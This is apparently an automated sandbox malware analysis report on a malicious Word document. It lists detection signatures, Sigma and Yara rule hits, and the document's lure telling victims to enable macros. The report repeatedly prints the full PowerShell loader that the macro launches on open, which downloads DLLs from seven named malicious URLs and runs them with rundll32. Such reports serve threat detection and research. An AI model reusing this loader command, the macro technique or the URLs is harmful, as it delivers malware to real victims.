
Windows Analysis Report 1711.doc

Overview

General Information

Sample Name: 1711.doc
Analysis ID: 526179
MD5: 85ab297345c97bca1a5004dc537f6c1c
SHA1: 0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256: 31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Document contains an embedded VBA macro which may execute processes
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to detect virtual machines (SLDT)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2640 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 2632 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2840 cmdline: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP
Rule: SUSP_VBA_FileSystem_Access
Description: Detects suspicious VBA that writes to disk and is activated on document open
Author: Florian Roth
Strings:
  • 0xa7c8:$s1: \Common Files\Microsoft Shared\
  • 0xab20:$s1: \Common Files\Microsoft Shared\
  • 0x3f5a:$s2: Scripting.FileSystemObject
  • 0x52a1:$a1: Document_Open
  • 0x9cb3:$a1: Document_Open
  • 0xb19d:$a1: Document_Open
  • 0xcac1:$a1: Document_Open

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2632
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started; Author: James Pemberton / @4A616D6573; Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2632
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2632, ProcessCommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs

Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: 1711.doc; Virustotal: Detection: 39%
Source: 1711.doc; Metadefender: Detection: 20%
Source: 1711.doc; ReversingLabs: Detection: 57%
Antivirus detection for URL or domain
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/P; Avira URL Cloud: Label: malware
Source: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/; Avira URL Cloud: Label: malware
Source: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/; Avira URL Cloud: Label: malware
Source: https://staviancjs.com/wp-forum/QOm4n2/; Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/; Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PE; Avira URL Cloud: Label: malware
Source: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/; Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\cmd.exe
Source: powershell.exe, 00000004.00000002.430534978.0000000003AB5000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQn
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: http://alfadandoinc.com/67oyp/C2h
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp; String found in binary or memory: http://itomsystem.in/i9eg3y/nN
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/
Source: powershell.exe, 00000004.00000002.427629821.0000000002E7C000.00000004.00000001.sdmp; String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/P
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PE
Source: powershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: http://thepilatesstudionj.com/wp
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp; String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQm
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/
Source: powershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp; String found in binary or memory: http://www.caboturnup.c
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp; String found in binary or memory: http://www.caboturnup.com/wp-content/p
Source: powershell.exe, 00000004.00000002.427876322.000000000311C000.00000004.00000001.sdmp; String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZg
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: https://staviancjs.co
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp; String found in binary or memory: https://staviancjs.com/wp-forum/QOm4
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: https://staviancjs.com/wp-forum/QOm4n2/
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp; String found in binary or memory: https://yougandan.com/backup
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp; String found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNc
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmp; String found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{52852A70-A935-4D7F-A270-7FCD1CA48619}.tmp

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4; Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4; Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4; Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8; Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. Ci 1_| O I I a O I
Source: Screenshot number: 8; Screenshot OCR: DOCUMENT IS PROTECTED. U Previewing is not available for protected documents. m You have to pres
Source: Screenshot number: 8; Screenshot OCR: protected documents. m You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview
Source: Screenshot number: 8; Screenshot OCR: ENABLE CONTENT" buttons to preview this document. Ci 1_| O I I a O I @ 100% G) A GE)
Source: Document image extraction number: 0; Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0; Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0; Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0; Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12; Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @
Source: Screenshot number: 12; Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation; OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, API IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer); Name: dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Source: 1711.doc; OLE indicator has summary info: false
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.dr; OLE indicator has summary info: false
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE indicator has summary info: false
Source: C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP, type: DROPPED; Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: 1711.doc; OLE indicator application name: unknown
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.dr; OLE indicator application name: unknown
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE indicator application name: unknown
Source: 1711.doc; OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation; OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function Document_Open; Name: Document_Open
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: Private Function JbxHook_Open_3__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: Set JbxHook_Open_3__ob_set = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob_set
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: Set WB = JbxHook_Open_3__ob_set(28, Workbooks, FileName, False, True)
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE, VBA macro line: Private Sub Document_Open()
Source: 1711.doc; OLE indicator, VBA macros: true
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE indicator, VBA macros: true
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFF0F57547FC904286.TMP.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 1711.doc; Virustotal: Detection: 39%
Source: 1711.doc; Metadefender: Detection: 20%
Source: 1711.doc; ReversingLabs: Detection: 57%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ..................l.....#.........................l.....................`I.........v.....................K......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....#................Hxk....................................}..v....8.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w..../................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w..../................Hxk....................................}..v....8.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....;................Ixk......M.............................}..v............0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....;................Hxk....X...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v............0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....G................Hxk....................................}..v.... .......0.................M.............................
